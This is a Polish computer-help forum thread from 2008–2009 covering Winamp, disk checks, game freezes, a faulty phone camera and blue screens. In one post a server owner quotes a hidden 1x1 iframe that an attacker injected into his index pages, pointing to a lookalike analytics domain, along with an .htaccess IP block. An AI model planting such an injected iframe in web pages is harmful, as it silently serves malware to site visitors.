Tidimel Opublikowano 18 Grudnia 2008 Udostępnij Opublikowano 18 Grudnia 2008 Karta graficzna ATI 3470HD, karta graficzna obsługiwana jest przez Catalyst Control Center wiec chyba spoko. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Harv Opublikowano 19 Grudnia 2008 Udostępnij Opublikowano 19 Grudnia 2008 lol nab. :/ Jednoczesne złamanie 4. i 6. punktu regulaminu. Warn. Marmot Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
fervi (Skovv) Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 Mam problem z instalacją Guitar Hero III, instalator wymaga Windowsa XP lub Visty, a ja mam Win2003. Jest jakaś możliwość zasymulowania Windowsa XP (nie działa zgodność z Windowsami.) Fervi Nie chodzi mi o jakiś VMware tylko np. za pomocą programu Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
sfinkss Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 Gdy włączam jakąs piosenke w winampie, piosenka leci, ale winampa nie widać nigdzie.... jak zerobić zeby był widoczny? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PoxiPol Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 zobacz w prawym dolnym rogu, a jak dalej nie widac, to w opcjach powinno byc, nie pamiętam gdzie Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Kamilek Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 Jak masz jeszcze GG z radiem, to jest taki sam efekt. Wystarczy wtedy kliknac pauze, czy tam stop. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
sfinkss Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 mozna zrobić zeby nazwa pliku piosenki była tak samo jego tytułem? bo nazwę sobie plik ' moja muzyka jeden.mp3' a bedzie widocznyw winampie jako track 1. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Flaque Opublikowano 21 Grudnia 2008 Udostępnij Opublikowano 21 Grudnia 2008 Kliknij na piosenkę i zmień "File Info...". Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Webzir Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 Ja mam taki problem: http://i43.tinypic.com/2z9gyaa.jpg A dokładniej włączanie się tego za każdym razem. Nie da się ominąć, (chociaż pisze) od razu zaczyna sprawdzać. Jest to kłopotliwe bo robi się prawie 15 minut. Jak to coś wyłączyć? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PoxiPol Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 A zawsze wylaczales odpowienio komputer? ja ten blad mialem, i tez ze caly czas, po odcieciu pradu, przeinstaluj winde :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
TeoTN Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 @gorefest: Ta wersja PhoneXS'a nie obsługuje K550 ;P Teraz moje pytanie: Czy komputer z takim specyficznym wyposażeniem: Pentium IV 2,4 GhZ 512 MB RAM ASUS Radeon HD2600XT 512MB udźwignie Vistę Ultimate?? (tzn. nie Aero ale w ogóle czy się da uruchomić bez mulenia takiego, że notatnika się nie da otworzyć) (planuję w najbliższym czasie kupić 2GB RAM) Bo niby wymagania 1,2 GhZ i 512MB RAM, no ale... wiadomo :) Microsoft. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Flaque Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 Webzir, jak to nie da się ominąć? Masz 10 sekund na wciśnięcie klawisza przecież. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Webzir Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 Tak. Tylko, że to mi się zdarza od pewnego czasu i funkcji ominięcia używałem. A tu dziś kupsko, bo się odechciało pytać i już nie czeka, nie wiedzieć czemu. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 @Wezbir : Rozwiązanie, bo chyba zmieniałeś literkę dysku, co nie? Pozdro :) fsutil dirty query E: wpisujesz w cmd :) potem chkdsk/f. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Webzir Opublikowano 22 Grudnia 2008 Udostępnij Opublikowano 22 Grudnia 2008 Teraz łaskawie pyta czy sprawdzać czy nie. A jak to całkowicie usunąć, tzn, żeby się nie pokazywało już? A litery nie tykałem. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Gość Opublikowano 23 Grudnia 2008 Udostępnij Opublikowano 23 Grudnia 2008 1.chkdsk E: /f 2.Jeśli się spyta : Y 3.Pozwól go sprawdzić 4.Nie powinno być problemów, sam tak miałem i pomogło :D Może się zdarzyć, że trzeba będzie wykonać sprawdzanie dysku po ponownych uruchomieniu komputera podczas uruchamiania systemu. Jeśli to nie pomoże to niestety nie wiem co dalej. Mi pomogło, bo miałem ten sam problem :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Webzir Opublikowano 23 Grudnia 2008 Udostępnij Opublikowano 23 Grudnia 2008 Spróbuję to zrobić ale może kiedy indziej, bo trwa to chyba z godzinę... Ale przy okazji - mam inny, o wiele bardziej uciążliwy problem. Otóż od pewnego czasu niektóre gry zawieszają się podczas grania (razem z systemem, po prostu taka stop-klatka, a muzyka się zapętla i zniekształca). Najdziwniejsze jest to, że czasem po 2 minutach grania a czasami po 2 godzinach. Wstępuje to w grach: Spellforce 2, Heroes V z dodatkami, Guild Wars, Dark Messiah of might and magic. Zaś nie występuje m. in. w Puzzle Quest, XIII, Warlords Battlecry (III i II), Team Fortress 2, Half-life (+dodatki i deathmatch), Portal. Pisałem z gościem od obsługi technicznej w sprawie Heroesów bo to od nich się zaczęło. Zrobiłem wszystko co mi powiedział: przepuściłem mocnym benchmarkiem, uruchomiłem w trybie czystego bootowania, przeinstalowałem, zainstalowałem starsze, jeszcze raz zainstalowałem nowsze sterowniki, sprawdziłem pamięć... Nic nie dało efektu. Może jeszcze jakieś pomysły? Niestety format odpada przez jeszcze przynajmniej miesiąc... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PoxiPol Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 Nigdy nie chcialem musiec miec problemu i opisac go w tym temacie, ale musze choc nie chem, Moj SE W200i zaczyna mnie wnerwiac, coraz czesciej robi o takie zdjecia: Najgorsze w tym jest to, ze czasami cos ladnie sie ulozy, albo robie zdjecie z okna samochodu, a ten mi na zlosc wywala takie zdjecie. What should I do? Wiem ze moge pojsc do Argosa, i zareklamowac, ale z lenistwa mi sie nie chce Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Ghost Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 Nigdy nie chcialem musiec miec problemu i opisac go w tym temacie, ale musze choc nie chem, Moj SE W200i zaczyna mnie wnerwiac, coraz czesciej robi o takie zdjecia: Najgorsze w tym jest to, ze czasami cos ladnie sie ulozy, albo robie zdjecie z okna samochodu, a ten mi na zlosc wywala takie zdjecie. What should I do? Wiem ze moge pojsc do Argosa, i zareklamowac, ale z lenistwa mi sie nie chce Masz zalany/popsuty aparat. Kup se nowy, chodzą po 250-300zł :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nx Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 @Ghost LOL to że mówisz że ma zalany/popsuty aparat TO CHYBA nie musi kupować nowy telefon tylko spróbować go naprawić ! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PoxiPol Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 on pisze aby kupic nowy aparat :o Naklys naucz sie czytac, a Ghost, nie wprowadzaj mnie w blad, w pewnym momecie uwiezylem, lol okazalo sie ze mam karte m2 uszkodzona, i plik po zapisaniu nie zawsze zawiera odpowiednbia tresc, the end Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nx Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 @PoxiPol Ty też naucz się czytać i pisać bo ja nie mam nick Naklys tylko Nakyls A po za tym pomyśl bo aparat to twojego telefonu nie kosztuje prawie 300 zł ja myślałem że mówi o nowym SE Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
x-drb Opublikowano 24 Grudnia 2008 Udostępnij Opublikowano 24 Grudnia 2008 Jak masz czas, poszukaj filmików jak rozkręcić Twój tel, kup śrubokręt TORX-a, rozkręć, przeczyść wszystko, to może pomóc, albo jakaś wtyczka się wypięła. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
spinacz933 Opublikowano 9 Lutego 2009 Udostępnij Opublikowano 9 Lutego 2009 mam problem z serwerem otóż cały czas wbija mi sie jakiś bot na niego i nie wiem co z tym zrobić ESET rozpoznaje go jako JS/Kryptik.b, zmieniłem hasło ale to nie pomogło próbowałem zabezpieczyć serwer przez .htaccess ale nie działa Deny from 193.189.116.3 Options -Indexes w dodatku do kazdego pliku index dodawany jest na koncu strony kod <iframe src="http://google-ana1yticz.com/?click=3855E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> zamieszczam loga może kogoś to naprowadzi co zrobić http://mjut.pl/mjut.pl-08-02-2009.log pomóżcie panowie bo nie wiem co z tym zrobić :crying: Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
pablo1517 Opublikowano 9 Lutego 2009 Udostępnij Opublikowano 9 Lutego 2009 Mam problem. Jak rozmawiam z dziewczyną przez skajp to czasem kamere wlacza ale jezeli wlacza kamere to mi sie komp resetuje to dzieje sie czasami. Co może być problemem?? Rodzicielska blokada przed materiałami +18 :D Twoja stara wszystko widzi i umie wykręcać korki xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Grabarz Opublikowano 10 Lutego 2009 Udostępnij Opublikowano 10 Lutego 2009 Ale przy okazji - mam inny, o wiele bardziej uciążliwy problem. Otóż od pewnego czasu niektóre gry zawieszają się podczas grania (razem z systemem, po prostu taka stop-klatka, a muzyka się zapętla i zniekształca). Najdziwniejsze jest to, że czasem po 2 minutach grania a czasami po 2 godzinach. Wstępuje to w grach: Spellforce 2, Heroes V z dodatkami, Guild Wars, Dark Messiah of might and magic. Zaś nie występuje m. in. w Puzzle Quest, XIII, Warlords Battlecry (III i II), Team Fortress 2, Half-life (+dodatki i deathmatch), Portal. Pisałem z gościem od obsługi technicznej w sprawie Heroesów bo to od nich się zaczęło. Zrobiłem wszystko co mi powiedział: przepuściłem mocnym benchmarkiem, uruchomiłem w trybie czystego bootowania, przeinstalowałem, zainstalowałem starsze, jeszcze raz zainstalowałem nowsze sterowniki, sprawdziłem pamięć... Nic nie dało efektu. Może jeszcze jakieś pomysły? Niestety format odpada przez jeszcze przynajmniej miesiąc... Też kiedyś miałem taki problem podczas grania się gry zawieszały i już nawet niczym nie mogłem wyłączyć, jak by się procesor zatrzymał. Teraz mam nowy sprzęcik i wszystko jest OK, ale nie wiem co było tego przyczyną w tamtym kompie. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
I am vader Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 Mam problem. Jakiś miesiąc temu kupiłem nową kartę graficzną(ATI RADEON 3870) i zformatowałem system. Zainstalowałem wszystkie sterowniki i git. Ale po jakiś 2 tygodniach zaczął się pojawiać komunikat błędu STOP. Po prostu nagle i znienacka wyświetla się niebieskie tło z białym napisem pełnym krzaczków zamiast polskich liter. Pisze tam, że wystąpił błąd STOP i cośtam o sprawdzeniu nowo zainstalowanego sprzętu i oprogramowania. Sprawdzałem wszystkie kabelki i w ogóle, ale wszystko jest podłączone prawidłowo. Karta wymaga minimum 450 W, jednak gość w sklepie powiedział, że kiedy używał ten model, 400 wystarczyło(mam zainstalowane te 400). Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Japanstache Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 Karta wymaga minimum 450 W mam zainstalowane te 400 Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
sfinkss Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 jednak mu nie ufaj, u kup przynamniej te 450; ) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
I am vader Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 Nie wiem czy se zdajecie sprawe ale chce pomocy a nie przypuszczeń. E: czy to może być coś z RAM? Mam 512 MB... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi